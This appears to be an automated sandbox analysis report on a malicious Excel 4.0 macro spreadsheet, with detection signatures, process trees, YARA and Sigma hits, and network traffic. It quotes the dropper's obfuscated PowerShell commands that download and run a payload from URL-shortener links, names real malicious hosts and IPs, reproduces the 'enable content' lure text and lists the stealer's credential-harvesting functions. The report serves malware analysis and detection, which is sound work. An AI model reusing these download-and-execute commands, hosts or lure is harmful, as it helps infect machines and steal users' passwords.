Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name:ul9kpUwYel.xls
Analysis ID:337274
MD5:c2ca4d5f2632597023b6cf5b496fb4ed
SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags:SilentBuilderxls

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2484 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2604 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2300 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 284 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2492 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2936 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 152 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2460 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2420 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 952 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 972 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 2036 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • cr.exe (PID: 2240 cmdline: 'C:\Users\user\AppData\Roaming\cr.exe' MD5: 740E559929463320CB8E0403FD35A097)
    • cmd.exe (PID: 2848 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2860 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
ul9kpUwYel.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x44bc2:$s1: Excel
  • 0x4135e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x12a6f:$r1: p^owersh^el^l
  • 0x12c98:$r1: p^owersh^el^l
  • 0x12f05:$r1: p^owersh^el^l
  • 0x130e2:$r1: p^owersh^el^l
  • 0x12a6f:$r2: p^owersh^el^l
  • 0x12c98:$r2: p^owersh^el^l
  • 0x12f05:$r2: p^owersh^el^l
  • 0x130e2:$r2: p^owersh^el^l
dump.pcap | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security

    Dropped Files

    Source | Rule | Description | Author | Strings
    C:\Users\user\Documents\pd.bat | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x2fd:$r1: p^owersh^el^l
    • 0x524:$r1: p^owersh^el^l
    • 0x701:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x2fd:$r2: p^owersh^el^l
    • 0x524:$r2: p^owersh^el^l
    • 0x701:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.bat | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security

      Memory Dumps

      Source | Rule | Description | Author | Strings
      00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth

      Sigma Overview

      System Summary:

      Sigma detected: Powershell downloading file from url shortener site
      Source: Process startedAuthor: Joe Security: Data: Command: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ProcessCommandLine: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat'), ProcessId: 2860
      Sigma detected: Microsoft Office Product Spawning Windows Shell
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2484, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2604
      Sigma detected: Hiding Files with Attrib.exe
      Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2936, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 152

      Signature Overview

      AV Detection:

      Antivirus detection for URL or domain
      Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exe, Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URL
      Source: trashbininspector.fun, Virustotal: Detection: 8%
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exe, ReversingLabs: Detection: 72%
      Multi AV Scanner detection for submitted file
      Source: ul9kpUwYel.xls, Virustotal: Detection: 41%
      Source: ul9kpUwYel.xls, Metadefender: Detection: 22%
      Source: ul9kpUwYel.xls, ReversingLabs: Detection: 34%
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0040B831
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,24_2_00409D52
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA,24_2_0041A507
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0040A753
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,24_2_0040908B
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,24_2_004233DC
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,24_2_004235AF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,24_2_0040964F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,24_2_004339BC
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,24_2_0029362C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA,24_2_0028A757
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree,24_2_002937FF
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData,24_2_0027989F
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0027A9A3
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,24_2_0027BA81
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen,24_2_002A3C0C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree,24_2_00279FA2
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCD2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0045F42D FindFirstFileExW,24_2_0045F42D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCF2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_0043DE3D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_002AE08D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002CF67D FindFirstFileExW,24_2_002CF67D
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF22
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF42
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,24_2_00434AFC
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

      Software Vulnerabilities:

      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe
      Source: global trafficDNS query: name: cutt.ly
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownload
      Source: global trafficHTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 195.201.225.248 195.201.225.248
      Source: Joe Sandbox ViewIP Address: 37.46.150.139 37.46.150.139
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
      Source: unknownDNS traffic detected: queries for: cutt.ly
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,24_2_004254E5
      Source: C:\Users\user\AppData\Roaming\cr.exe, File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: dump.pcap, type: PCAP, Matched rule: Detects powershell keyword obfuscated with carets, Author: Florian Roth
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detects powershell keyword obfuscated with carets, Author: Florian Roth
      Source: C:\Users\user\Documents\pd.bat, type: DROPPED, Matched rule: Detects powershell keyword obfuscated with carets, Author: Florian Roth
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 4Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 8Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
      Source: Screenshot number: 8Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Screenshot number: 12Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
      Source: Screenshot number: 12Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
      Source: Document image extraction number: 0Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 0Screenshot OCR: Enable Content" on the yellow bar above.
      Source: Document image extraction number: 1Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
      Source: Document image extraction number: 1Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
      Source: Document image extraction number: 1Screenshot OCR: Enable Content" on the yellow bar above.
      Found Excel 4.0 Macro with suspicious formulas
      Source: ul9kpUwYel.xls, Initial sample: EXEC
      Found obfuscated Excel 4.0 Macro
      Source: ul9kpUwYel.xls, Initial sample: High usage of CHAR() function: 21
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\cr.exe
      Source: C:\Users\user\AppData\Roaming\cr.exe, Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\cr.exe, Memory allocated: 76D20000 page execute and read and write
      Source: ul9kpUwYel.xls, OLE indicator, VBA macros: true
      Source: sqlite3.dll.24.dr, Static PE information: Number of sections : 18 > 10
      Source: cr.exe.23.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: cr.exe.23.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ul9kpUwYel.xls, type: SAMPLE, Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: dump.pcap, type: PCAP, Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: C:\Users\user\Documents\pd.bat, type: DROPPED, Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: classification engine, Classification label: mal100.spyw.expl.evad.winXLS@36/22@17/5
      Source: C:\Users\user\AppData\Roaming\cr.exe, Code function: 24_2_00437BD1 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW
      Source: C:\Users\user\AppData\Roaming\cr.exe, Code function: 24_2_0043433D CoCreateInstance
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\251F0000
      Source: C:\Users\user\AppData\Roaming\cr.exe, Mutant created: \Sessions\1\BaseNamedObjects\dfthorbnjuser
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRD29.tmp
      Source: ul9kpUwYel.xls, OLE indicator, Workbook stream: true
      Source: unknown, Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|...............f....................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................9]Q......................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q........J.............D$.............X...............................Jump to behavior
